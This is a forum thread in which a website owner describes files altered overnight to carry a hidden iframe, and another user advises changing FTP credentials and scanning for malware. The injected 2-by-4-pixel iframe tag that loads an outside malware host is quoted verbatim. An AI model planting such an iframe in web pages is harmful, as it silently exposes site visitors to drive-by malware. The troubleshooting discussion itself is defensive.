Iframe Attack on index.php

[moonmosaic]

So this morning I got a warning coming from my website hosted with a hosting company that went like this:

"The website contains elements from the site ntwportal.com, which appears to host malware – software that can hurt your computer or otherwise operate without your consent. Just visiting a site that contains malware can infect your computer."

When I checked the error log I found that 2 files were changed last night; index.php and 404.php. Well, I didn't change a thing so I checked the files and nicely they had the Iframe virus embedded in them.
My hosting provider couldn't help, they said that my ftp password must have got compromised and the hacker got in. After doing some search for "<iframe src="http://ntwportal.com/" width="2" height="4"></iframe>" I found that perhaps the my enabled Google Analytics has something to do with this?

Any idea, anyone? I replaced the corrupted files so the website seems to be running ok but I would love to be able to prevent this from happening again. Any input would be appreciated, thank you.

[Dave Sniper]

I had experienced a similar thing in the past. it targeted to all files which have substring like "index" or "default".
Firstly, you should change your FTP username and password. Secondly, scan virus and malware from your computer.. your FTP client might be infected.

Hope it has helped.

Dave

[moonmosaic]

Thank you. I did all that, cleared all private data from my filezilla ftp client and changed ftp passwords. None of my virus scanners (viper, malwarebytes, windows defender) came up with anything so I don't know how these hackers got in if that is what had happened. I also found a phpinfo.php file in the root of my directory - guessing put there by the hackers. I was also suprised the hosting company didn't seem concerned. They said I should just upload a clean copy of my website - nah, if it was that simple with prestashop.

[Dave Sniper]

I'm glad that you did it all. I used Avast (free for home user) which is better than licensed AVG. I think you just have to wait and see if the problem still persists.